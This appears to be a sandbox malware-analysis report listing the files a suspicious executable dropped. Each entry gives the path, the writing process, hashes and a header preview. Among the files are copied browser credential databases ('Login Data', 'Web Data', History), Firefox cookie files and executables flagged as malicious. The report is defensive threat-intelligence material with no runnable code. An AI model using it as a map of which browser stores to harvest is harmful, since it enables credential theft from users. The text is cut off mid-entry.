Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\FNbFcIvk184YLogin Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\GxAKz2TVOQMgWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\HRHKbrVD0SPVHistory

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\UigSviQpPox7History

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\i1FjU3_t2EcQWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\iw_7hvvsUyErWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\n2rbRZ1slNzyHistory

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\zqYCvMxePYKSWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	4.058068250306624
Encrypted:	false
SSDEEP:	192:46MTeid8XO+N2RPnqkHM2rrRbwz6ln+rnbdaBlJBRJBBti94muL+Xh2IwoXAsLi2:ST6O+NwqAM+k6lnWnboZDXyRPtAsLiA
MD5:	B6F11A0AB7715F570F45900A1FE84732
SHA1:	77B1201E535445AF5EA94C1B03C0A1C34D67A77B
SHA-256:	E47DD306A9854599F02BC1B07CA6DFBD5220F8A1352FAA9616D1A327DE0BBF67
SHA-512:	78A757E67D21EB7CC95954DF15E3EEFF56113D6B40FB73F0C5F53304265CC52C79125D6F1B3655B64F9A411711B5B70F746080D708D7C222F4E65BAD64B1B771
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.X.5.6.5.6.5.6.5.7.7.6.W.%.6.6...<.=.6...8.4.6...2.4.6.Rich5.6.........................PE..L....g.E...........!.....@...0.......E.......P.......................................................................P.......P..(............................p.......................................................P...............................text..._5.......@.................. ..`.rdata.......P.......P..............@..@.data...@....`.......`..............@....reloc.......p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	693760
Entropy (8bit):	6.467810024381368
Encrypted:	false
SSDEEP:	12288:lhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO1+u1nWXExyd:A/qrQ0yVrPg37AzHqA6Zfn013NWXExyd
MD5:	1468F751DD82E8A2B603DE47E40EA363
SHA1:	98AD87C530D457FEEA9BBF01A2F0AA651D1310B9
SHA-256:	EC5029BBEC68E156756D0F546A1F4BA430CB2FA99317967B654E19A88C4450CA
SHA-512:	EF2AD7D18D415513D22872F24FD920270B9DEE5F59374D2F637B5F6998703307E8B264DAEEEAFABD05D7AB4C8B083BC3E60C24DD45AC1A1DFCFA752DB9EC720B
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wsjtivv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293888
Entropy (8bit):	5.9425444164565215
Encrypted:	false
SSDEEP:	3072:zzuOI8Ak8wluVa+n5dqT44444YKYZxLPqdjLA1zDcAr8MDTgYCmiMAkv8+4z9XOI:v6Pk944444YKSqNszxhALMXv4z9Xk
MD5:	917E3841636183444EC8970D46F1A89A
SHA1:	2923622ABF90A9085219F73256DF8B7BA78F0A89
SHA-256:	6900CB0A36AF370900E5B5E21504F8E931A01F856D8546AEB7676E9497B4FBBF
SHA-512:	1F6C14B8FCFB51C04084C9979CA5938C8F57ABE1F6606034CB34809D3846027EB2F91116AF966E7482115DAF99FFDB2E42471D604B295E3B7D5C122BBA185BF4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...j~.d......................n......<............@...........................o..............................................`..P.... n.................................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.....l..p...@...V..............@....rsrc........ n.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\3txhawinMkO2CAFAcsaKTzSR.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	HTML document, Non-ISO extended-ASCII text, with very long lines (18208)
Category:	dropped
Size (bytes):	256647
Entropy (8bit):	5.14374187589075
Encrypted:	false
SSDEEP:	3072:q73zQBFyw7Pm8NbNLaA4FCNSxtkulNYeZR1OBE0mRpgo+inIY6/uW:IDMBzLa1Coxt9lF1RhznIY6uW
MD5:	C3BB3E5C4095891EBC88880AE2E81114
SHA1:	7F481DDF335DD474166E508387E8DFB25C2F5AD4
SHA-256:	4A78B48F20ABDA0718DA33BEE3A798A479B30A7CAC3A4535C50DEE04E9C5374B
SHA-512:	227E742296E82A2F41AE7A407FD32A54F129A46BEE7FE3007E2A6FC7400B3D2E7F8ADF38061521106529A9580FBD71BB0C3F525E47A0CB2466CCDF547F742ECB
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />.<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error \| VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace(

C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	206848
Entropy (8bit):	4.538159813608514
Encrypted:	false
SSDEEP:	1536:94Nn++cDme06rAzdtxF0dhkDgpqPh8Wiim5o7:94cmh/0bIgGh+o7
MD5:	53B44E832F052CF336E7D356905F0AB2
SHA1:	6BB1792FDE0BDAADA7646E74569D3B16DB4BCAD0
SHA-256:	B3261D1E6211A2DE0F1E527D401E658813C94AC0CFAB8ED81D9BB5362C2BC96A
SHA-512:	B2DE50F75BE824CD5150D7B6C25E9FE4B2D9F77594AB38B20FA679E18AFE83F68B14EEBDA07501BA40E1EFC8DE297780D9F444A31CDC0BD076729595DC1456FF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............F=... ...@....@.. ....................................`..................................<..O....@.......................`......P<..8............................................ ............... ..H............text...L.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................(=......H........&...............<..p...........................................Z(.....(....s....(......(.....~....-.r...p.....(....o....s.........~.....~............~......(....Vs....(....t.........6.(.....(..............s....s....}.....{....o .....0..u........{....o!...("......j.o#.....{....o!...($... @B..jZ(%....+...jX...o&....(%....('...-..o(...rC..p()...&..o...()...&..*...........gg..$....0..e.......s+.....r]..po,....re..po-.....o.....r...po/....r...po0.....o1....3!.

C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11214848
Entropy (8bit):	7.97772484802616
Encrypted:	false
SSDEEP:	196608:oPnV1Bk/fRaGxUCBIORz5Z2YoZX0tMmp6tgq1D//XxdgPxwdT:oPKfR/UCBF+dZX0tMft/vxdgpG
MD5:	B091C4848287BE6601D720997394D453
SHA1:	9180E34175E1F4644D5FA63227D665B2BE15C75B
SHA-256:	D0B06CA6ECE3FEF6671FA8ACD3D560A9400891ABCD10F5CEDCFE7BD1E6050DFE
SHA-512:	A3B3663FD343389AEE2CBF76F426401D436992B2B56CEA3B60E9C2E385510FA874FA45B2AC75703074F0303934C4223EAEE1983851374A2E753FD0302042CC5A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....L.f..........#.................y..........@.............................@............ ...................................................f.d.......X,..`...*...........................................v..(... ..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...h...........................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...4+......................... ..`.text1..8...........................@....text2..\... .....................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	292864
Entropy (8bit):	5.922649251142475
Encrypted:	false
SSDEEP:	3072:oKTN28++LlAwt+nxdm0Qn4C/pRL7X4SBu8g5zeDq5bQQicHpOUnFYNO9XOddA:H0teiIjg9jEQBrnFYNO9Xk
MD5:	3E827E8493283924563C9CD4D0DFCD0A
SHA1:	B4D63A9D4CC4E698300FCC9991024358869F418C
SHA-256:	C6936B6C28616DC80FABBC270059CE8D396F6F9DA009A3F4AA54E0DB5062ABF0
SHA-512:	94C56B557D171489C5AD806C48DF31E613FC463176C6195A36CFE27A22B39D4B5F2BE5DCCA8A4200B4E3805612B0EA154B60BF76B4542DBF319B204B032D7418
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...g.Qd......................n......<............@...........................o..............................................`..P.... n.................................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data....l..p...<...V..............@....rsrc........ n.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293888
Entropy (8bit):	5.9425444164565215
Encrypted:	false
SSDEEP:	3072:zzuOI8Ak8wluVa+n5dqT44444YKYZxLPqdjLA1zDcAr8MDTgYCmiMAkv8+4z9XOI:v6Pk944444YKSqNszxhALMXv4z9Xk
MD5:	917E3841636183444EC8970D46F1A89A
SHA1:	2923622ABF90A9085219F73256DF8B7BA78F0A89
SHA-256:	6900CB0A36AF370900E5B5E21504F8E931A01F856D8546AEB7676E9497B4FBBF
SHA-512:	1F6C14B8FCFB51C04084C9979CA5938C8F57ABE1F6606034CB34809D3846027EB2F91116AF966E7482115DAF99FFDB2E42471D604B295E3B7D5C122BBA185BF4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...j~.d......................n......<............@...........................o..............................................`..P.... n.................................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.....l..p...@...V..............@....rsrc........ n.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5655872
Entropy (8bit):	7.990599402357966
Encrypted:	true
SSDEEP:	98304:o4waPleUxNjsPr660ZDEJRpvcGs9IiQp9eA4WTFmN:ogPle2Njselcs9ap9eJWTcN
MD5:	A7615F3FAF64E8C2DC8412FC30D5AE17
SHA1:	92AD812D672CA6C6F0927156C0B404A57947C3D4
SHA-256:	5C8618B4628653D6EDEC64F21B5BC96F5698A0829E3245D3A8852DD37E2CB090
